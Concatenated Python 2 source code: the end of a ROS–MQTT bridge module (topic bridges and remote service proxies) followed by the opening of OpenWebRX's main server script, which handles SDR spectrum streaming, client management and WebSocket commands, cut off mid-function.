self._service_topic = control_topic + '/service/request/#'
self._register_service_topic = control_topic + '/service/register/#'
self._mqtt_client.subscribe(self._control_topic, qos=2)
self._mqtt_client.message_callback_add(self._control_topic, self._callback_mqtt_topic)
self._mqtt_client.subscribe(self._service_topic, qos=2)
self._mqtt_client.message_callback_add(self._service_topic, self._callback_mqtt_service)
self._mqtt_client.subscribe(self._register_service_topic, qos=2)
self._mqtt_client.message_callback_add(self._register_service_topic, self._register_service)
self._bridges = set([])
rospy.loginfo('DynamicBridgeServer started on control topic %s' % control_topic)
def _callback_mqtt_service(self, client, userdata, mqtt_msg):
t = Thread(target=self.__callback_mqtt_service, args=(userdata, mqtt_msg))
t.start()
def __callback_mqtt_service(self, userdata, mqtt_msg):
rospy.logdebug("MQTT service call received from {}".format(mqtt_msg.topic))
msg_dict = self._deserialize(mqtt_msg.payload)
service_type = lookup_object(msg_dict['type'])
request_type = lookup_object(msg_dict['type'] + 'Request')
# create request object
request = request_type()
# and populate it
populate_instance(msg_dict['args'], request)
response_type = lookup_object(msg_dict['type'] + 'Response')
# create empty response object
response = response_type()
msg_dict['op'] = 'response'
try:
rospy.logdebug('waiting for service %s' % msg_dict['service'])
rospy.wait_for_service(msg_dict['service'], 1)
service = rospy.ServiceProxy(msg_dict['service'], service_type)
response = service.call(request)
msg_dict['response'] = extract_values(response)
except Exception:
rospy.logerr("Service %s doesn't exist" % msg_dict['service'])
msg_dict['response'] = None
finally:
payload = bytearray(self._serialize(msg_dict))
self._mqtt_client.publish(
topic=msg_dict['response_topic'], payload=payload,
qos=2, retain=False)
def _register_service(self, client, userdata, mqtt_msg):
msg_dict = self._deserialize(mqtt_msg.payload)
if msg_dict['op'] == 'register':
rospy.loginfo("register service proxy")
self._bridges.add(RemoteService(
**msg_dict['args'])
)
def _callback_mqtt_topic(self, client, userdata, mqtt_msg):
u""" callback from MQTT
:param mqtt.Client client: MQTT client used in connection
:param userdata: user defined data
:param mqtt.MQTTMessage mqtt_msg: MQTT message
"""
msg_dict = self._deserialize(mqtt_msg.payload)
def __bridge_exists(args):
for __bridge in self._bridges:
if __bridge._topic_from == args['topic_to'] and\
__bridge._topic_to == args['topic_from']:
return True
return False
if msg_dict['op'] == 'mqtt2ros_subscribe':
if not __bridge_exists(msg_dict['args']):
rospy.loginfo("forward mqtt topic to ros %s" % (
msg_dict['args']))
self._bridges.add(MqttToRosBridge(
**msg_dict['args'])
)
else:
rospy.loginfo("bridge for %s already initialised" % (
msg_dict['args']))
if msg_dict['op'] == 'ros2mqtt_subscribe':
if not __bridge_exists(msg_dict['args']):
rospy.loginfo("forward ros topic to mqtt %s" % (
msg_dict['args']))
self._bridges.add(RosToMqttBridge(
**msg_dict['args'])
)
else:
rospy.logwarn("bridge for %s already initialised" % (
msg_dict['args']))
class RosToMqttBridge(Bridge):
u""" Bridge from ROS topic to MQTT
:param str topic_from: incoming ROS topic path
:param str topic_to: outgoing MQTT topic path
:param class msg_type: subclass of ROS Message
:param (float|None) frequency: publish frequency
:param bool latched: retain the last message on the MQTT topic (default: False)
:param int qos: MQTT quality of service (default: 0, max: 2)
"""
def __init__(self, topic_from, topic_to, msg_type, frequency=None, latched=False, qos=0):
self._topic_from = topic_from
self._topic_to = self._extract_private_path(topic_to)
self._last_published = rospy.get_time()
self._interval = 0 if frequency is None else 1.0 / frequency
self._latched = latched
self._qos = qos
if isinstance(msg_type, basestring):
msg_type = lookup_object(msg_type)
if not issubclass(msg_type, rospy.Message):
raise TypeError(
"msg_type should be rospy.Message instance or its string"
"reprensentation")
rospy.Subscriber(topic_from, msg_type, self._callback_ros)
def _callback_ros(self, msg):
rospy.logdebug("ROS received from {}".format(self._topic_from))
now = rospy.get_time()
if now - self._last_published >= self._interval:
self._publish(msg)
self._last_published = now
def _publish(self, msg):
payload = bytearray(self._serialize(extract_values(msg)))
self._mqtt_client.publish(
topic=self._topic_to, payload=payload,
qos=self._qos, retain=self._latched)
class MqttToRosBridge(Bridge):
u""" Bridge from MQTT to ROS topic
:param str topic_from: incoming MQTT topic path
:param str topic_to: outgoing ROS topic path
:param class msg_type: subclass of ROS Message
:param (float|None) frequency: publish frequency
:param int queue_size: ROS publisher's queue size (default: 10)
:param bool latch: latch the ROS topic (default: False)
:param int qos: MQTT quality of service (default: 0, max: 2)
"""
def __init__(self, topic_from, topic_to, msg_type, frequency=None,
queue_size=10, latched=False, qos=0):
self._topic_from = self._extract_private_path(topic_from)
self._topic_to = topic_to
if isinstance(msg_type, basestring):
msg_type = lookup_object(msg_type)
if not issubclass(msg_type, rospy.Message):
raise TypeError(
"msg_type should be rospy.Message instance or its string"
"reprensentation")
self._msg_type = msg_type
self._queue_size = queue_size
self._latched = latched
self._qos = qos
self._last_published = rospy.get_time()
self._interval = None if frequency is None else 1.0 / frequency
# Adding the correct topic to subscribe to
self._mqtt_client.subscribe(self._topic_from, qos=self._qos)
self._mqtt_client.message_callback_add(self._topic_from, self._callback_mqtt)
self._publisher = rospy.Publisher(
self._topic_to, self._msg_type, queue_size=self._queue_size, latch=self._latched)
def _callback_mqtt(self, client, userdata, mqtt_msg):
u""" callback from MQTT
:param mqtt.Client client: MQTT client used in connection
:param userdata: user defined data
:param mqtt.MQTTMessage mqtt_msg: MQTT message
"""
rospy.logdebug("MQTT received from {}".format(mqtt_msg.topic))
now = rospy.get_time()
if self._interval is None or now - self._last_published >= self._interval:
try:
ros_msg = self._create_ros_message(mqtt_msg)
self._publisher.publish(ros_msg)
self._last_published = now
except Exception as e:
rospy.logerr(e)
def _create_ros_message(self, mqtt_msg):
u""" create ROS message from MQTT payload
:param mqtt.Message mqtt_msg: MQTT Message
:return rospy.Message: ROS Message
"""
msg_dict = self._deserialize(mqtt_msg.payload)
return populate_instance(msg_dict, self._msg_type())
class SubscribeBridge(MqttToRosBridge):
def __init__(self, topic_from, topic_to, msg_type, control_topic="__dynamic_server", frequency=None, latched=False, qos=0):
self._control_topic = control_topic + '/topic/' + topic_from.replace('/', '_')
self._mqtt_topic = control_topic + '_DATA_' + (topic_from + "_TO_" + topic_to).replace('/','_')
super(SubscribeBridge, self).__init__(self._mqtt_topic, topic_to, msg_type, frequency, latched, qos)
rospy.loginfo('SubscribeBridge: subscribe ROS topic %s to topic %s via MQTT %s' %
(topic_from, topic_to, self._mqtt_topic)
)
cmd = {
'op': 'ros2mqtt_subscribe',
'args': {
'topic_from': topic_from,
'topic_to': self._mqtt_topic,
'msg_type': msg_type,
'frequency': frequency,
'latched': latched,
'qos': qos
}
}
payload = bytearray(self._serialize(cmd))
self._mqtt_client.publish(
topic=self._control_topic, payload=payload,
qos=2, retain=True)
class PublishBridge(RosToMqttBridge):
def __init__(self, topic_from, topic_to, msg_type, control_topic="__dynamic_server", frequency=None, latched=False, qos=0):
self._control_topic = control_topic + '/topic/' + topic_to.replace('/', '_')
self._mqtt_topic = control_topic + '_DATA_' + (topic_from + "_TO_" + topic_to).replace('/','_')
super(PublishBridge, self).__init__(topic_from, self._mqtt_topic, msg_type, frequency, latched, qos)
rospy.loginfo('PublishBridge: publish from ROS topic %s to topic %s via MQTT %s' %
(topic_from, topic_to, self._mqtt_topic)
)
cmd = {
'op': 'mqtt2ros_subscribe',
'args': {
'topic_from': self._mqtt_topic,
'topic_to': topic_to,
'msg_type': msg_type,
'frequency': frequency,
'latched': latched,
'qos': qos
}
}
payload = bytearray(self._serialize(cmd))
self._mqtt_client.publish(
topic=self._control_topic, payload=payload,
qos=2, retain=True)
class LocalServiceProxy(Bridge):
def __init__(self, local_server, remote_server, srv_type, control_topic="__remote_server"):
self._register_service_topic = control_topic + '/service/register/' + (local_server + "_TO_" + remote_server).replace('/','_')
rospy.loginfo('LocalServiceProxy: offer remote access to ROS service %s as %s via MQTT' %
(local_server, remote_server)
)
cmd = {
'op': 'register',
'args': {
'local_server': remote_server,
'remote_server': local_server,
'srv_type': srv_type,
'control_topic': control_topic
}
}
payload = bytearray(self._serialize(cmd))
self._mqtt_client.publish(
topic=self._register_service_topic, payload=payload,
qos=2, retain=True)
class RemoteService(Bridge):
def __init__(self, local_server, remote_server, srv_type, control_topic="__remote_server"):
self._local_server = local_server
self._remote_server = remote_server
self._control_topic = control_topic
self._mqtt_topic_request = self._control_topic + '/service/request/' + (local_server + "_TO_" + remote_server).replace('/','_')
self._srv_type_name = srv_type
self._srv_type = lookup_object(self._srv_type_name)
self._serviceproxy = rospy.Service(self._local_server, self._srv_type, self._ros_handler)
def _ros_handler(self, req):
responses = {}
lock = Condition()
def __response_handler(client, userdata, mqtt_msg):
msg_dict = self._deserialize(mqtt_msg.payload)
rospy.logdebug('got response for %s' % msg_dict['id'])
with lock:
responses[msg_dict['id']] = msg_dict['response']
lock.notifyAll()
rospy.logdebug('local service %s called.' % self._local_server)
# generate a unique ID
request_id = str(uuid4())
# build a request to send to the external client
request_message = {
"op": "call_service",
"id": request_id,
"response_topic": self._control_topic + '/service/response/' + request_id,
"type": self._srv_type_name,
"service": self._remote_server,
"args": extract_values(req)
}
# Adding the correct topic to subscribe to
self._mqtt_client.subscribe(request_message['response_topic'], qos=2)
self._mqtt_client.message_callback_add(request_message['response_topic'], __response_handler)
payload = bytearray(self._serialize(request_message))
self._mqtt_client.publish(
topic=self._mqtt_topic_request, payload=payload,
qos=2, retain=False)
# wait for a response
while not rospy.is_shutdown() and request_id not in responses.keys():
with lock:
lock.wait(1) # check for shutdown every 1 second
resp = responses[request_id]
del responses[request_id]
self._mqtt_client.unsubscribe(request_message['response_topic'])
# assemble response object
response_type = lookup_object(self._srv_type_name+"Response")
# create response object
r = response_type()
# and populate it
if resp is None:
rospy.logerr('Service Request could not be completed')
raise rospy.ROSException('Service Request could not be completed')
populate_instance(resp, r)
return r
__all__ = [
'create_bridge', 'Bridge', 'RosToMqttBridge', 'MqttToRosBridge',
'DynamicBridgeServer', 'SubscribeBridge', 'PublishBridge', 'RemoteService', 'LocalServiceProxy']
|
openwebrx.py
|
#!/usr/bin/python2.7
print "" # python2.7 is required to run OpenWebRX instead of python3. Please run me by: python2 openwebrx.py
"""
This file is part of OpenWebRX,
an open-source SDR receiver software with a web UI.
Copyright (c) 2013-2015 by Andras Retzler <randras@sdr.hu>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as
published by the Free Software Foundation, either version 3 of the
License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
sw_version="v0.17"
#0.15 (added nmux)
import os
import code
import importlib
import csdr
import thread
import time
import datetime
import subprocess
import os
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
from SocketServer import ThreadingMixIn
import fcntl
import time
import md5
import random
import threading
import sys
import traceback
from collections import namedtuple
import Queue
import ctypes
#import rtl_mus
import rxws
import uuid
import signal
import socket
try: import sdrhu
except: sdrhu=False
avatar_ctime=""
#pypy compatibility
try: import dl
except: pass
try: import __pypy__
except: pass
pypy="__pypy__" in globals()
"""
def import_all_plugins(directory):
for subdir in os.listdir(directory):
if os.path.isdir(directory+subdir) and not subdir[0]=="_":
exact_path=directory+subdir+"/plugin.py"
if os.path.isfile(exact_path):
importname=(directory+subdir+"/plugin").replace("/",".")
print "[openwebrx-import] Found plugin:",importname
importlib.import_module(importname)
"""
class MultiThreadHTTPServer(ThreadingMixIn, HTTPServer):
pass
def handle_signal(sig, frame):
global spectrum_dsp
if sig == signal.SIGUSR1:
print "[openwebrx] Verbose status information on USR1 signal"
print
print "time.time() =", time.time()
print "clients_mutex.locked() =", clients_mutex.locked()
print "clients_mutex_locker =", clients_mutex_locker
if server_fail: print "server_fail = ", server_fail
print "spectrum_thread_watchdog_last_tick =", spectrum_thread_watchdog_last_tick
print
print "clients:",len(clients)
for client in clients:
print
for key in client._fields:
print "\t%s = %s"%(key,str(getattr(client,key)))
elif sig == signal.SIGUSR2:
code.interact(local=globals())
else:
print "[openwebrx] Ctrl+C: aborting."
cleanup_clients(True)
spectrum_dsp.stop()
os._exit(1) #not too graceful exit
def access_log(data):
global logs
logs.access_log.write("["+datetime.datetime.now().isoformat()+"] "+data+"\n")
logs.access_log.flush()
receiver_failed=spectrum_thread_watchdog_last_tick=rtl_thread=spectrum_dsp=server_fail=None
def main():
global clients, clients_mutex, pypy, lock_try_time, avatar_ctime, cfg, logs
global serverfail, rtl_thread
print
print "OpenWebRX - Open Source SDR Web App for Everyone! | for license see LICENSE file in the package"
print "_________________________________________________________________________________________________"
print
print "Author contact info: Andras Retzler, HA7ILM <randras@sdr.hu>"
print
no_arguments=len(sys.argv)==1
if no_arguments: print "[openwebrx-main] Configuration script not specified. I will use: \"config_webrx.py\""
cfg=__import__("config_webrx" if no_arguments else sys.argv[1])
for option in ("access_log","csdr_dynamic_bufsize","csdr_print_bufsizes","csdr_through"):
if not option in dir(cfg): setattr(cfg, option, False) #initialize optional config parameters
#Open log files
logs = type("logs_class", (object,), {"access_log":open(cfg.access_log if cfg.access_log else "/dev/null","a"), "error_log":""})()
#Set signal handler
signal.signal(signal.SIGINT, handle_signal) #http://stackoverflow.com/questions/1112343/how-do-i-capture-sigint-in-python
signal.signal(signal.SIGUSR1, handle_signal)
signal.signal(signal.SIGUSR2, handle_signal)
#Pypy
if pypy: print "pypy detected (and now something completely different: c code is expected to run at a speed of 3*10^8 m/s?)"
#Change process name to "openwebrx" (to be seen in ps)
try:
for libcpath in ["/lib/i386-linux-gnu/libc.so.6","/lib/libc.so.6"]:
if os.path.exists(libcpath):
libc = dl.open(libcpath)
libc.call("prctl", 15, "openwebrx", 0, 0, 0)
break
except:
pass
#Start rtl thread
if os.system("csdr 2> /dev/null") == 32512: #check for csdr
print "[openwebrx-main] You need to install \"csdr\" to run OpenWebRX!\n"
return
if os.system("nmux --help 2> /dev/null") == 32512: #check for nmux
print "[openwebrx-main] You need to install an up-to-date version of \"csdr\" that contains the \"nmux\" tool to run OpenWebRX! Please upgrade \"csdr\"!\n"
return
if cfg.start_rtl_thread:
nmux_bufcnt = nmux_bufsize = 0
while nmux_bufsize < cfg.samp_rate/4: nmux_bufsize += 4096
while nmux_bufsize * nmux_bufcnt < cfg.nmux_memory * 1e6: nmux_bufcnt += 1
if nmux_bufcnt == 0 or nmux_bufsize == 0:
print "[openwebrx-main] Error: nmux_bufsize or nmux_bufcnt is zero. These depend on nmux_memory and samp_rate options in config_webrx.py"
return
print "[openwebrx-main] nmux_bufsize = %d, nmux_bufcnt = %d" % (nmux_bufsize, nmux_bufcnt)
cfg.start_rtl_command += "| nmux --bufsize %d --bufcnt %d --port %d --address 127.0.0.1" % (nmux_bufsize, nmux_bufcnt, cfg.iq_server_port)
rtl_thread=threading.Thread(target = lambda:subprocess.Popen(cfg.start_rtl_command, shell=True), args=())
rtl_thread.start()
print "[openwebrx-main] Started rtl_thread: "+cfg.start_rtl_command
print "[openwebrx-main] Waiting for I/Q server to start..."
while True:
testsock=socket.socket()
try: testsock.connect(("127.0.0.1", cfg.iq_server_port))
except:
time.sleep(0.1)
continue
testsock.close()
break
print "[openwebrx-main] I/Q server started."
#Initialize clients
clients=[]
clients_mutex=threading.Lock()
lock_try_time=0
#Start watchdog thread
print "[openwebrx-main] Starting watchdog threads."
mutex_test_thread=threading.Thread(target = mutex_test_thread_function, args = ())
mutex_test_thread.start()
mutex_watchdog_thread=threading.Thread(target = mutex_watchdog_thread_function, args = ())
mutex_watchdog_thread.start()
#Start spectrum thread
print "[openwebrx-main] Starting spectrum thread."
spectrum_thread=threading.Thread(target = spectrum_thread_function, args = ())
spectrum_thread.start()
#spectrum_watchdog_thread=threading.Thread(target = spectrum_watchdog_thread_function, args = ())
#spectrum_watchdog_thread.start()
get_cpu_usage()
bcastmsg_thread=threading.Thread(target = bcastmsg_thread_function, args = ())
bcastmsg_thread.start()
#threading.Thread(target = measure_thread_function, args = ()).start()
#Start sdr.hu update thread
if sdrhu and cfg.sdrhu_key and cfg.sdrhu_public_listing:
print "[openwebrx-main] Starting sdr.hu update thread..."
avatar_ctime=str(os.path.getctime("htdocs/gfx/openwebrx-avatar.png"))
sdrhu_thread=threading.Thread(target = sdrhu.run, args = ())
sdrhu_thread.start()
#Start HTTP thread
httpd = MultiThreadHTTPServer(('', cfg.web_port), WebRXHandler)
print('[openwebrx-main] Starting HTTP server.')
access_log("Starting OpenWebRX...")
httpd.serve_forever()
# This is a debug function below:
measure_value=0
def measure_thread_function():
global measure_value
while True:
print "[openwebrx-measure] value is",measure_value
measure_value=0
time.sleep(1)
def bcastmsg_thread_function():
global clients
while True:
time.sleep(3)
try: cpu_usage=get_cpu_usage()
except: cpu_usage=0
cma("bcastmsg_thread")
for i in range(0,len(clients)):
clients[i].bcastmsg="MSG cpu_usage={0} clients={1}".format(int(cpu_usage*100),len(clients))
cmr()
def mutex_test_thread_function():
global clients_mutex, lock_try_time
while True:
time.sleep(0.5)
lock_try_time=time.time()
clients_mutex.acquire()
clients_mutex.release()
lock_try_time=0
def cma(what): #clients_mutex acquire
global clients_mutex
global clients_mutex_locker
if not clients_mutex.locked(): clients_mutex_locker = what
clients_mutex.acquire()
def cmr():
global clients_mutex
global clients_mutex_locker
clients_mutex_locker = None
clients_mutex.release()
def mutex_watchdog_thread_function():
global lock_try_time
global clients_mutex_locker
global clients_mutex
while True:
if lock_try_time != 0 and time.time()-lock_try_time > 3.0:
#if 3 seconds pass without unlock
print "[openwebrx-mutex-watchdog] Mutex unlock timeout. Locker: \""+str(clients_mutex_locker)+"\" Now unlocking..."
clients_mutex.release()
time.sleep(0.5)
def spectrum_watchdog_thread_function():
global spectrum_thread_watchdog_last_tick, receiver_failed
while True:
time.sleep(60)
if spectrum_thread_watchdog_last_tick and time.time()-spectrum_thread_watchdog_last_tick > 60.0:
print "[openwebrx-spectrum-watchdog] Spectrum timeout. Seems like no I/Q data is coming from the receiver.\nIf you're using RTL-SDR, the receiver hardware may randomly fail under some circumstances:\n1) high temperature,\n2) insufficient current available from the USB port."
print "[openwebrx-spectrum-watchdog] Deactivating receiver."
receiver_failed="spectrum"
return
def check_server():
global spectrum_dsp, server_fail, rtl_thread
if server_fail: return server_fail
#print spectrum_dsp.process.poll()
if spectrum_dsp and spectrum_dsp.process.poll()!=None: server_fail = "spectrum_thread dsp subprocess failed"
#if rtl_thread and not rtl_thread.is_alive(): server_fail = "rtl_thread failed"
if server_fail: print "[openwebrx-check_server] >>>>>>> ERROR:", server_fail
return server_fail
def apply_csdr_cfg_to_dsp(dsp):
dsp.csdr_dynamic_bufsize = cfg.csdr_dynamic_bufsize
dsp.csdr_print_bufsizes = cfg.csdr_print_bufsizes
dsp.csdr_through = cfg.csdr_through
def spectrum_thread_function():
global clients, spectrum_dsp, spectrum_thread_watchdog_last_tick
spectrum_dsp=dsp=csdr.dsp()
dsp.nc_port=cfg.iq_server_port
dsp.set_demodulator("fft")
dsp.set_samp_rate(cfg.samp_rate)
dsp.set_fft_size(cfg.fft_size)
dsp.set_fft_fps(cfg.fft_fps)
dsp.set_fft_averages(int(round(1.0 * cfg.samp_rate / cfg.fft_size / cfg.fft_fps / (1.0 - cfg.fft_voverlap_factor))) if cfg.fft_voverlap_factor>0 else 0)
dsp.set_fft_compression(cfg.fft_compression)
dsp.set_format_conversion(cfg.format_conversion)
apply_csdr_cfg_to_dsp(dsp)
sleep_sec=0.87/cfg.fft_fps
print "[openwebrx-spectrum] Spectrum thread initialized successfully."
dsp.start()
if cfg.csdr_dynamic_bufsize:
dsp.read(8) #dummy read to skip bufsize & preamble
print "[openwebrx-spectrum] Note: CSDR_DYNAMIC_BUFSIZE_ON = 1"
print "[openwebrx-spectrum] Spectrum thread started."
bytes_to_read=int(dsp.get_fft_bytes_to_read())
spectrum_thread_counter=0
while True:
data=dsp.read(bytes_to_read)
#print "gotcha",len(data),"bytes of spectrum data via spectrum_thread_function()"
if spectrum_thread_counter >= cfg.fft_fps:
spectrum_thread_counter=0
spectrum_thread_watchdog_last_tick = time.time() #once every second
else: spectrum_thread_counter+=1
cma("spectrum_thread")
correction=0
for i in range(0,len(clients)):
i-=correction
if (clients[i].ws_started):
if clients[i].spectrum_queue.full():
print "[openwebrx-spectrum] client spectrum queue full, closing it."
close_client(i, False)
correction+=1
else:
clients[i].spectrum_queue.put([data]) # add new string by "reference" to all clients
cmr()
def get_client_by_id(client_id, use_mutex=True):
global clients
output=-1
if use_mutex: cma("get_client_by_id")
for i in range(0,len(clients)):
if(clients[i].id==client_id):
output=i
break
if use_mutex: cmr()
if output==-1:
raise ClientNotFoundException
else:
return output
def log_client(client, what):
print "[openwebrx-httpd] client {0}#{1} :: {2}".format(client.ip,client.id,what)
def cleanup_clients(end_all=False):
# - if a client doesn't open websocket for too long time, we drop it
# - or if end_all is true, we drop all clients
global clients
cma("cleanup_clients")
correction=0
for i in range(0,len(clients)):
i-=correction
#print "cleanup_clients:: len(clients)=", len(clients), "i=", i
if end_all or ((not clients[i].ws_started) and (time.time()-clients[i].gen_time)>45):
if not end_all: print "[openwebrx] cleanup_clients :: client timeout to open WebSocket"
close_client(i, False)
correction+=1
cmr()
def generate_client_id(ip):
#add a client
global clients
new_client=namedtuple("ClientStruct", "id gen_time ws_started sprectum_queue ip closed bcastmsg dsp loopstat")
new_client.id=md5.md5(str(random.random())).hexdigest()
new_client.gen_time=time.time()
new_client.ws_started=False # to check whether client has ever tried to open the websocket
new_client.spectrum_queue=Queue.Queue(1000)
new_client.ip=ip
new_client.bcastmsg=""
new_client.closed=[False] #byref, not exactly sure if required
new_client.dsp=None
cma("generate_client_id")
clients.append(new_client)
log_client(new_client,"client added. Clients now: {0}".format(len(clients)))
cmr()
cleanup_clients()
return new_client.id
def close_client(i, use_mutex=True):
global clients
log_client(clients[i],"client being closed.")
if use_mutex: cma("close_client")
try:
clients[i].dsp.stop()
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
print "[openwebrx] close_client dsp.stop() :: error -",exc_type,exc_value
traceback.print_tb(exc_traceback)
clients[i].closed[0]=True
access_log("Stopped streaming to client: "+clients[i].ip+"#"+str(clients[i].id)+" (users now: "+str(len(clients)-1)+")")
del clients[i]
if use_mutex: cmr()
# http://www.codeproject.com/Articles/462525/Simple-HTTP-Server-and-Client-in-Python
# some ideas are used from the artice above
class WebRXHandler(BaseHTTPRequestHandler):
def proc_read_thread():
pass
def send_302(self,what):
self.send_response(302)
self.send_header('Content-type','text/html')
self.send_header("Location", "http://{0}:{1}/{2}".format(cfg.server_hostname,cfg.web_port,what))
self.end_headers()
self.wfile.write("<html><body><h1>Object moved</h1>Please <a href=\"/{0}\">click here</a> to continue.</body></html>".format(what))
def do_GET(self):
self.connection.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
global dsp_plugin, clients_mutex, clients, avatar_ctime, sw_version, receiver_failed
rootdir = 'htdocs'
self.path=self.path.replace("..","")
path_temp_parts=self.path.split("?")
self.path=path_temp_parts[0]
request_param=path_temp_parts[1] if(len(path_temp_parts)>1) else ""
access_log("GET "+self.path+" from "+self.client_address[0])
try:
if self.path=="/":
self.path="/index.wrx"
# there's even another cool tip at http://stackoverflow.com/questions/4419650/how-to-implement-timeout-in-basehttpserver-basehttprequesthandler-python
#if self.path[:5]=="/lock": cma("do_GET /lock/") # to test mutex_watchdog_thread. Do not uncomment in production environment!
if self.path[:4]=="/ws/":
print "[openwebrx-ws] Client requested WebSocket connection"
if receiver_failed: self.send_error(500,"Internal server error")
try:
# ========= WebSocket handshake =========
ws_success=True
try:
rxws.handshake(self)
cma("do_GET /ws/")
client_i=get_client_by_id(self.path[4:], False)
myclient=clients[client_i]
except rxws.WebSocketException: ws_success=False
except ClientNotFoundException: ws_success=False
finally:
if clients_mutex.locked(): cmr()
if not ws_success:
self.send_error(400, 'Bad request.')
return
# ========= Client handshake =========
if myclient.ws_started:
print "[openwebrx-httpd] error: second WS connection with the same client id, throwing it."
self.send_error(400, 'Bad request.') #client already started
return
rxws.send(self, "CLIENT DE SERVER openwebrx.py")
client_ans=rxws.recv(self, True)
if client_ans[:16]!="SERVER DE CLIENT":
rxws.send("ERR Bad answer.")
return
myclient.ws_started=True
#send default parameters
rxws.send(self, "MSG center_freq={0} bandwidth={1} fft_size={2} fft_fps={3} audio_compression={4} fft_compression={5} max_clients={6} setup".format(str(cfg.shown_center_freq),str(cfg.samp_rate),cfg.fft_size,cfg.fft_fps,cfg.audio_compression,cfg.fft_compression,cfg.max_clients))
# ========= Initialize DSP =========
dsp=csdr.dsp()
dsp_initialized=False
dsp.set_audio_compression(cfg.audio_compression)
dsp.set_fft_compression(cfg.fft_compression) #used by secondary chains
dsp.set_format_conversion(cfg.format_conversion)
dsp.set_offset_freq(0)
dsp.set_bpf(-4000,4000)
dsp.set_secondary_fft_size(cfg.digimodes_fft_size)
dsp.nc_port=cfg.iq_server_port
apply_csdr_cfg_to_dsp(dsp)
myclient.dsp=dsp
do_secondary_demod=False
access_log("Started streaming to client: "+self.client_address[0]+"#"+myclient.id+" (users now: "+str(len(clients))+")")
while True:
myclient.loopstat=0
if myclient.closed[0]:
print "[openwebrx-httpd:ws] client closed by other thread"
break
# ========= send audio =========
if dsp_initialized:
myclient.loopstat=10
temp_audio_data=dsp.read(256)
myclient.loopstat=11
rxws.send(self, temp_audio_data, "AUD ")
# ========= send spectrum =========
while not myclient.spectrum_queue.empty():
myclient.loopstat=20
spectrum_data=myclient.spectrum_queue.get()
#spectrum_data_mid=len(spectrum_data[0])/2
#rxws.send(self, spectrum_data[0][spectrum_data_mid:]+spectrum_data[0][:spectrum_data_mid], "FFT ")
# (it seems GNU Radio exchanges the first and second part of the FFT output, we correct it)
myclient.loopstat=21
rxws.send(self, spectrum_data[0],"FFT ")
# ========= send smeter_level =========
smeter_level=None
while True:
try:
myclient.loopstat=30
smeter_level=dsp.get_smeter_level()
if smeter_level == None: break
except:
break
if smeter_level!=None:
myclient.loopstat=31
rxws.send(self, "MSG s={0}".format(smeter_level))
# ========= send bcastmsg =========
if myclient.bcastmsg!="":
myclient.loopstat=40
rxws.send(self,myclient.bcastmsg)
myclient.bcastmsg=""
# ========= send secondary =========
if do_secondary_demod:
myclient.loopstat=41
while True:
try:
secondary_spectrum_data=dsp.read_secondary_fft(dsp.get_secondary_fft_bytes_to_read())
if len(secondary_spectrum_data) == 0: break
# print "len(secondary_spectrum_data)", len(secondary_spectrum_data) #TODO digimodes
rxws.send(self, secondary_spectrum_data, "FFTS")
except: break
myclient.loopstat=42
while True:
try:
myclient.loopstat=422
secondary_demod_data=dsp.read_secondary_demod(1)
myclient.loopstat=423
if len(secondary_demod_data) == 0: break
# print "len(secondary_demod_data)", len(secondary_demod_data), secondary_demod_data #TODO digimodes
rxws.send(self, secondary_demod_data, "DAT ")
except: break
# ========= process commands =========
while True:
myclient.loopstat=50
rdata=rxws.recv(self, False)
myclient.loopstat=51
#try:
if not rdata: break
elif rdata[:3]=="SET":
print "[openwebrx-httpd:ws,%d] command: %s"%(client_i,rdata)
pairs=rdata[4:].split(" ")
bpf_set=False
new_bpf=dsp.get_bpf()
filter_limit=dsp.get_output_rate()/2
for pair in pairs:
param_name, param_value = pair.split("=")
if param_name == "low_cut" and -filter_limit <= int(param_value) <= filter_limit:
bpf_set=True
new_bpf[0]=int(param_value)
elif param_name == "high_cut" and -filter_limit <= int(param_value) <= filter_limit:
bpf_set=True
new_bpf[1]=int(param_value)
elif param_name == "offset_freq" and -cfg.samp_rate/2 <= int(param_value) <= cfg.samp_rate/2:
myclient.loopstat=510
dsp.set_offset_freq(int(param_value))
elif param_name == "squelch_level" and float(param_value) >= 0:
myclient.loopstat=520
dsp.set_squelch_level(float(param_value))
elif param_name=="mod":
if (dsp.get_demodulator()!=param_value):
myclient.loopstat=530
if dsp_initialized: dsp.stop()
dsp.set_demodulator(param_value)
if dsp_initialized: dsp.start()
elif param_name == "output_rate":
if not dsp_initialized:
myclient.loopstat=540
dsp.set_output_rate(int(param_value))
myclient.loopstat=541
dsp.set_samp_rate(cfg.samp_rate)
elif param_name=="action" and param_value=="start":
if not dsp_initialized:
myclient.loopstat=550
dsp.start()
dsp_initialized=True
elif param_name=="secondary_mod" and cfg.digimodes_enable:
if (dsp.get_secondary_demodulator() != param_value):
if dsp_initialized: dsp.stop()
if param_value == "off":
dsp.set_secondary_demodulator(None)
do_secondary_demod = False
else:
dsp.set_secondary_demodulator(param_value)
do_secondary_demod = True
rxws.send(self, "MSG secondary_fft_size={0} if_samp_rate={1} secondary_bw={2} secondary_setup".format(cfg.digimodes_fft_size, dsp.if_samp_rate(), dsp.secondary_bw()))
if dsp_initialized: dsp.start()
elif param_name=="secondary_offset_freq" and 0 <= int(param_value) <= dsp.if_samp_rate()/2 and cfg.digimodes_enable:
dsp.set_secondary_offset_freq(int(param_value))
else:
print "[openwebrx-httpd:ws] invalid parameter"
if bpf_set:
myclient.loopstat=560
dsp.set_bpf(*new_bpf)
#code.interact(local=locals())
except:
myclient.loopstat=990
exc_type, exc_value, exc_traceback = sys.exc_info()
print "[openwebrx-httpd:ws] exception: ",exc_type,exc_value
traceback.print_tb(exc_traceback) #TODO digimodes
#if exc_value[0]==32: #"broken pipe", client disconnected
# pass
#elif exc_value[0]==11: #"resource unavailable" on recv, client disconnected
# pass
#else:
# print "[openwebrx-httpd] error in /ws/ handler: ",exc_type,exc_value
# traceback.print_tb(exc_traceback)
#stop dsp for the disconnected client
myclient.loopstat=991
try:
dsp.stop()
del dsp
except:
print "[openwebrx-httpd] error in dsp.stop()"
#delete disconnected client
myclient.loopstat=992
try:
cma("do_GET /ws/ delete disconnected")
